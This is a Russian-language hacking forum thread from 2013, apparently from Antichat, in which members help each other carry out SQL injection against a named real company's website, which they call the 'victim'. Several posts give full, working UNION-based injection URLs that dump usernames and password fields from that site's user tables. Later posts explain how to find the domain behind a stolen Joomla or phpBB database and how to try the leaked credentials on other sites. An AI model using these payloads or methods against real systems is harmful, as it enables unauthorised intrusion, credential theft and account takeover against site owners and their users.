 |
|
10.07.2013, 01:54
|
|
Участник форума
Регистрация: 10.01.2013
Сообщений: 100
С нами:
7019606
Репутация:
27
|
|
Сообщение от usupekx
Подскажите:
жертва
- ttp://www.terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=16
узнаю названия таблиц
- ttp://terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()
узнаю название столбцов
- http://terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()
на выходе имею такую связку (таблица -
user
, столбцы - userName,userPass)
ww.terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(userPass),3,4,5,6 from
users
и получаю:
Invalid query: Unknown column 'userPass' in 'field list'
Уязвимость разбираю из соседнего раздела /threadnav21336-1550-10.html - нашел её
YaBTR
и вот вариант рабочий:
ttp://www.terrapex.ca/en/nouvelle.php?lanouvelle=&id=22+union+select+1,grou p_concat(
userpwd,0x3a,user rights
),version(),4,5+from+users--
Где и как найти эти
userpwd,0x3a,user rights
может просто внимательней быть?
>>Где и как найти эти userpwd,0x3a,user rights
0x3a - это хекс код разделителя, а остальные - названия столбцов таблицы. Как найти написано в статье Dr.Zero
|
|
|
10.07.2013, 02:45
|
|
Новичок
Регистрация: 03.07.2013
Сообщений: 3
С нами:
6769046
Репутация:
0
|
|
Сообщение от BlackIce
может просто внимательней быть?
>>Где и как найти эти userpwd,0x3a,user rights
0x3a - это хекс код разделителя, а остальные - названия столбцов таблицы. Как найти написано в статье Dr.Zero
действительно, описАлся. Но, увы, не помогло
читал не раз статью эту и нетолько её. про хекс это понятно, просто вставил.
попробую конкретнее задать вопрос. может ли быть такое что только брут форсом будут подобраны названия столбцов? Или всё-таки их можно выудить?
|
|
|
|
10.07.2013, 04:40
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от usupekx
Подскажите:
жертва
- ttp://www.terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=16
узнаю названия таблиц
- ttp://terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()
узнаю название столбцов
- http://terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()
на выходе имею такую связку (таблица - user, столбцы - userName,userPass)
ww.terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(userPass),3,4,5,6 from users
и получаю:
Invalid query: Unknown column 'userPass' in 'field list'
Уязвимость разбираю из соседнего раздела /threadnav21336-1550-10.html - нашел её
YaBTR
и вот вариант рабочий:
ttp://www.terrapex.ca/en/nouvelle.php?lanouvelle=&id=22+union+select+1,grou p_concat(
userpwd,0x3a,user rights
),version(),4,5+from+users--
Где и как найти эти
userpwd,0x3a,user rights
Код:
http://terrapex.ca/en/realisation.php?larealisation=x&id=(16)and(0)union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3,4,5,6--+
Код:
http://terrapex.ca/en/realisation.php?larealisation=x&id=(16)and(0)union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(web_terrapex_ca.intranetusers)where(0x00)in(@x:=concat(@x,0x3c62723e,userName,0x3a,userPass))))x),3,4,5,6--+
Код:
http://terrapex.ca/en/realisation.php?larealisation=x&id=(16)and(0)union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(web_terrapex_ca.users)where(0x00)in(@x:=concat(@x,0x3c62723e,userrights,0x3a,userpwd))))x),3,4,5,6--+
|
|
|
|
12.07.2013, 00:33
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
хтонить в курсе, есть ли в БД ждомлы запись о том какой домен пренадлежит базе? ато так пробежался и ничего путного не нашол
|
|
|
|
12.07.2013, 04:06
|
|
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
С нами:
7670486
Репутация:
76
|
|
Сообщение от qaz
хтонить в курсе, есть ли в БД ждомлы запись о том какой домен пренадлежит базе? ато так пробежался и ничего путного не нашол
Точный адрес в БД Jooml'ы не прописан, наксколько мне известно, но возможно возможно подскажет следующее:
1. Select email from jos_users where usertype='Super Administrator'
Смотрим мыло админа, довольно часто бывает что в названии админского мыла указывается источник на домен, например admin@искомый_домен.com. Если же нет, и там просто мыло типа mail.ru, то можно пройти сюда 2ip.ru/domain-list-by-email/, вести полученное мыло, и если повезет и поиск выдаст какие-то домены, найти те, сайты которых на Jooml'e. Возможно искомый домен окажется в этом списке.
2. Select title from jos_categories
Получаем заголовки страниц, хранящихся в БД. Далее идем в гугл и составляем поисковый запрос, что-то типа intitle:"Полученный title". Опять таки, если повезет, то в выдаче гугла можно найти сайт по искомому заголовку.
3. Просто посмотреть на сайты, находящиеся на этом ip, если их там не много, и не влом этим заниматься, то отсеять все, которые не на Jooml'e, ну а в оставшиеся попытаться войти, используя полученные данные из jos_users. Авось повезет.
Но, это все конечно не панацея и не дает 100% результат в поиске искомого домена. Так, информация к размышлению, скорее
|
|
|
|
12.07.2013, 20:46
|
|
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами:
7359446
Репутация:
-10
|
|
Подскажите возможно ли как-то автоматически скопировать все ссылки сайтов из гугла по определённому запросу,чтоб не копировать всё по одному?Спасибо.
|
|
|
|
12.07.2013, 23:01
|
|
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами:
7359446
Репутация:
-10
|
|
Никто не в курсе?
|
|
|
|
12.07.2013, 23:04
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от Sat-hacker
Никто не в курсе?
пишешь скрипт парсера выдачи и парсишь, проблем?
|
|
|
|
13.07.2013, 23:41
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от Га-Ноцри
Точный адрес в БД Jooml'ы не прописан, наксколько мне известно, но возможно возможно подскажет следующее:
1. Select email from jos_users where usertype='Super Administrator'
Смотрим мыло админа, довольно часто бывает что в названии админского мыла указывается источник на домен, например admin@искомый_домен.com. Если же нет, и там просто мыло типа mail.ru, то можно пройти сюда 2ip.ru/domain-list-by-email/, вести полученное мыло, и если повезет и поиск выдаст какие-то домены, найти те, сайты которых на Jooml'e. Возможно искомый домен окажется в этом списке.
2. Select title from jos_categories
Получаем заголовки страниц, хранящихся в БД. Далее идем в гугл и составляем поисковый запрос, что-то типа intitle:"Полученный title". Опять таки, если повезет, то в выдаче гугла можно найти сайт по искомому заголовку.
3. Просто посмотреть на сайты, находящиеся на этом ip, если их там не много, и не влом этим заниматься, то отсеять все, которые не на Jooml'e, ну а в оставшиеся попытаться войти, используя полученные данные из jos_users. Авось повезет.
Но, это все конечно не панацея и не дает 100% результат в поиске искомого домена. Так, информация к размышлению, скорее
ммм, сенкс, а в phpbb есть чёнибуть для наводки?
|
|
|
|
14.07.2013, 04:48
|
|
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
С нами:
7670486
Репутация:
76
|
|
Сообщение от qaz
ммм, сенкс, а в phpbb есть чёнибуть для наводки?
В случае с phpbb все гораздо прозрачнее.
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]SELECT config_value FROM phpbb_config WHERE config_name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'server_name'[/COLOR][/COLOR]
Получаем домен, на котором расположен форум.
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]SELECT config_value FROM phpbb_config WHERE config_name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'script_path'[/COLOR][/COLOR]
Получаем конечную папку с форумом, доступную из веба.
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
